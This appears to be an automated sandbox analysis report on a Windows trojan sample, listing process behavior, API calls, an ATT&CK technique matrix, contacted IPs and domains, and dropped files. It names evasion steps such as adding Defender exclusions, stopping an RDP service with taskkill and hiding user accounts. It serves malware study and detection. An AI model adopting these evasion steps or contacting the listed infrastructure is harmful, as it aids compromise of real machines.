Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B936FD5 GetSystemTimeAsFileTime,5_2_00007FF64B936FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11506DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,23_2_00007FFE11506DA3
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.31.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.31.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.31.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: cwjk513wjc7a1mlgh3.exe, 00000005.00000002.1754874180.000002C49AA18000.00000004.00000020.00020000.00000000.sdmp, Amcache.hve.31.drBinary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE115058DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE115058DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BDAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE11BDAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11EC1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE11EC1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126E28BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE126E28BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126FB820 listen,htons,recv,select,23_2_00007FFE126FB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126FB7E8 bind,23_2_00007FFE126FB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A4F418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE1A4F418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A5215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE1A5215FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE117758DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FFE117758DA
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
21
Disable or Modify Tools
1
Network Sniffing
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API
1
DLL Side-Loading
2
Valid Accounts
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
1
Create Account
2
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager1
System Service Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution
2
Valid Accounts
4
Windows Service
1
Software Packing
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd4
Windows Service
11
Process Injection
1
Timestomp
LSA Secrets1
Network Sniffing
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
DLL Side-Loading
Cached Domain Credentials24
System Information Discovery
VNCGUI Input Capture1
Proxy
Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion
DCSync1
Network Share Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Masquerading
Proc Filesystem131
Security Software Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Valid Accounts
/etc/passwd and /etc/shadow31
Virtualization/Sandbox Evasion
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
Access Token Manipulation
Network Sniffing2
Process Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd31
Virtualization/Sandbox Evasion
Input Capture1
Application Window Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
Process Injection
Keylogging1
System Owner/User Discovery
Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Hidden Users
GUI Input Capture1
System Network Configuration Discovery
Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
Services File Permissions Weakness
Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531723 Sample: file.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 81 reseed.diva.exchange 2->81 83 banana.incognet.io 2->83 99 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->99 101 Contains functionality to hide user accounts 2->101 103 Connects to many ports of the same IP (likely port scanning) 2->103 105 7 other signatures 2->105 9 main.exe 2->9         started        14 file.exe 3 2->14         started        16 main.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 85 77.54.240.255 VODAFONE-PTVodafonePortugalPT Portugal 9->85 87 173.68.123.78 UUNETUS United States 9->87 95 17 other IPs or domains 9->95 67 C:\Windows\Temp\w3LkirgH, PE32+ 9->67 dropped 69 C:\Windows\Temp\t291wOio, PE32+ 9->69 dropped 71 C:\Windows\Temp\ogg99SMu, PE32+ 9->71 dropped 79 15 other files (13 malicious) 9->79 dropped 121 Multi AV Scanner detection for dropped file 9->121 123 Contains functionality to hide user accounts 9->123 125 Found Tor onion address 9->125 20 WerFault.exe 9->20         started        89 146.70.24.213, 1125, 49730 TENET-1ZA United Kingdom 14->89 73 C:\Users\user\...\cwjk513wjc7a1mlgh3.exe, PE32+ 14->73 dropped 75 C:\Users\...\73tsjpnle0jv48sgryqfs6ph8t.exe, PE32+ 14->75 dropped 77 C:\...\7mmwpep245voy3fngkym99px3pj5vx36.bat, DOS 14->77 dropped 23 73tsjpnle0jv48sgryqfs6ph8t.exe 10 14->23         started        26 cmd.exe 1 14->26         started        28 cwjk513wjc7a1mlgh3.exe 3 14->28         started        91 23.128.248.23 CHEMUNGCONYUS Reserved 16->91 93 reseed.diva.exchange 80.74.145.70 ASN-METANETRoutingpeeringissuesnocmetanetchCH Switzerland 16->93 97 5 other IPs or domains 16->97 127 Detected unpacking (creates a PE file in dynamic memory) 18->127 30 WerFault.exe 18->30         started        file6 signatures7 process8 file9 63 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->63 dropped 65 C:\Users\Public\...\main.exe, PE32+ 23->65 dropped 109 Multi AV Scanner detection for dropped file 23->109 111 Contains functionality to hide user accounts 23->111 113 Machine Learning detection for dropped file 23->113 115 Found Tor onion address 23->115 32 taskkill.exe 1 23->32         started        34 sc.exe 1 23->34         started        36 sc.exe 1 23->36         started        47 4 other processes 23->47 117 Modifies Windows Defender protection settings 26->117 119 Adds a directory exclusion to Windows Defender 26->119 38 powershell.exe 23 26->38         started        41 powershell.exe 23 26->41         started        43 powershell.exe 23 26->43         started        45 conhost.exe 26->45         started        signatures10 process11 signatures12 49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        53 conhost.exe 36->53         started        107 Loading BitLocker PowerShell Module 38->107 55 conhost.exe 47->55         started        57 conhost.exe 47->57         started        59 conhost.exe 47->59         started        61 conhost.exe 47->61         started        process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe75%ReversingLabsWin64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe42%ReversingLabsWin64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe3%ReversingLabs
C:\Windows\Temp\6rRRlGVV0%ReversingLabs
C:\Windows\Temp\Cw0MZxef0%ReversingLabs
C:\Windows\Temp\ROF9A37w0%ReversingLabs
C:\Windows\Temp\TsG1eHIt0%ReversingLabs
C:\Windows\Temp\bMZx4vGr0%ReversingLabs
C:\Windows\Temp\eKTTDy2k0%ReversingLabs
C:\Windows\Temp\ogg99SMu0%ReversingLabs
C:\Windows\Temp\t291wOio0%ReversingLabs
C:\Windows\Temp\w3LkirgH0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
